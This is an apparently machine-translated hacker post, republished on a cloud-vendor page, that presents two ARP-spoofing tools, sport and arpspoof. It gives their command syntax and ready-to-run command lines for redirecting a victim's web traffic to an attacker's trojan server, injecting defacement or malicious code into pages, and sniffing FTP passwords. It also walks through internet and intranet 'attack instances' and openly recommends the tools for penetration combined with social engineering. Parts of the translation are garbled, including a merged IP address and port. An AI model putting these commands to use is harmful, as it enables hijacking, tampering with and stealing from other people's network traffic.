ARP spoofing-based port hijacking tool (sport) and session modification tool (arspoof)

Source: Internet
Author: User

Original] ARP spoofing-based port hijacking tool (sport) and session modification tool (arspoof)

[Original] ARP spoofing-based port hijacking tool (sport) and session modification tool (arspoof)

First: sport.exe

Environment Adaptation: Lan + Switch
Sport.exe (VC ++ 6.0 & Winpcap 3.1 & UPX release) 17kb

ARP portspoof ver 1.0 by cooldiyer
Usage:
Sport & lt; Target & gt; & lt; IP1 & gt; & lt; Port & gt; & lt; ip2 & gt; & lt; Port & gt; & lt; adpnum & gt;
Sport/L

Sport/L list NICs

Assume that the IP address of Baidu.com is 220.181.18.114, the IP address to be spoofed is 192.168.0.12, And the nic id is 2.
To forward data to other websites when 192.168.0.12 accesses Baidu, run the following command:

Go to port 81 of port 202.107.5.23 (your network horse is configured) and the nic id is 2

Sport 192.168.0.12 220.181.18.114 80 202.107.5.23 81 2

At this time, when 192.168.0.12 accesses Baidu, the returned data is the information returned on port 81 of port 202.107.5.23.

You can also switch to another host on the LAN, such

Sport 192.168.0.12 220.181.18.114 80 192.168.0.1008080 2

You can also switch to yourself. Assume that your IP address is 192.168.0.18, a Web server is mounted, and the port is 81.

Sport 192.168.0.12 220.181.18.114 80 192.168.0.18 81 2

When you access Baidu at 192.168.0.12, the page on your Web Service is displayed.

BecauseProgramTarget, that is, the host must have a CIDR Block with you.
There is also the inability to spoof the gateway (because the danger is too high, the program skipped this sectionCode)

These functions can be used for Intranet penetration, coupled with social engineering, can do a lot of unexpected things
__________________________

Second: arpspoof.exe

Environment Adaptation: Lan + Switch
Sport.exe (VC ++ 6.0 & Winpcap 3.1 & UPX release) 19.5kb

Arpspoof ver 3.1 By cooldiyer
Usage:
Arpspoof & lt; IP1 & gt; & lt; ip2 & gt; & lt; Port & gt; & lt; adpnum & gt; & lt; Mode & gt; & lt; jobfile & gt;
Arpspoof/L
Mode options:
0 IP1 -- & gt; ip2
1 IP1 & lt;-& gt; ip2
Examples:
& Gt; arpspoof 192.168.0.1 192.168.0.8 80 2 1 job.txt
# Spoof 192.168.0.1 & lt;-& gt; 192.168.0.8

& Gt; arpspoof 192.168.0.1 192.168.0.8 80 2 0/Reset
# Reset 192.168.0.1 -- & gt; 192.168.0.8

& Gt; arpspoof/L
# Lists adapters

& Gt; arpspoof/n
# Release a new replace job file

The function implemented by the program is to modify data packets while spoofing by arpspoof and add malicious code (available on the public network)

Arpspoof/L list Nic IDS

Note that the content format in jobfile is as follows (you can use arpspoof/N to create a Task file)

----
& Lt; hea
----
Hack by cooldiyer & lt; noframes & gt;
----
& Lt; hea
----
Hack by cooldiyer & lt; noframes & gt;

What do you mean by changing "& lt; hea" to "hack by cooldiyer & lt; noframes & gt, the webpage only displays
"Hack by cooldiyer", because the & lt; noframes & gt; tag shields all the labels behind it. This is a good trick.
The program regards it "----" as a separator. Starting from the first separator, the first is the old string to be replaced, and the second is the new string to be replaced. line breaks are not allowed.
Next, the third separator is the old string to be replaced, and the fourth separator is the new string to be replaced. classes can be added infinitely, but the fewer the separators, the better,
Because the program is too much to eat

The following describes attack instances.

1: Internet attack instance

For example, if the Baidu host is 220.181.18.114, you have the highest permission for a random host, for example, 220.181.18.9, And the gateway is 220.181.18.1.
You can check whether the network card ID is. You can change the number of data destined for the Network to. job.txt is generated using arpspoof/n. The command is as follows:
Arpspoof 220.181.18.1 220.181.18.114 80 2 0 job.txt
In this way, when others access Baidu, they will only see one line of "hack by cooldiyer". Of course, you can also change other data for other purposes.

2: Intranet attack instance
Similarly, when you want 192.168.0.100 to access Baidu, you can see a page hacked. The Gateway is 192.168.0.1. By default, execute the following command:
Arpspoof 192.168.0.1 192.168.0.100 80 2 0 job.txt
When it visits Baidu, it will see the hacked page. Of course, you can also rewrite it into other code.

3: data sniffing. Haha, basic functions. If the parameter is not followed by the task file, the program will display the data on the specified port, for example, sniffing the FTP password.

Arpspoof 202.103.248.1 202.103.248.100 21 2 1

The program will automatically display the data of port 21 that has been sniffed.

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.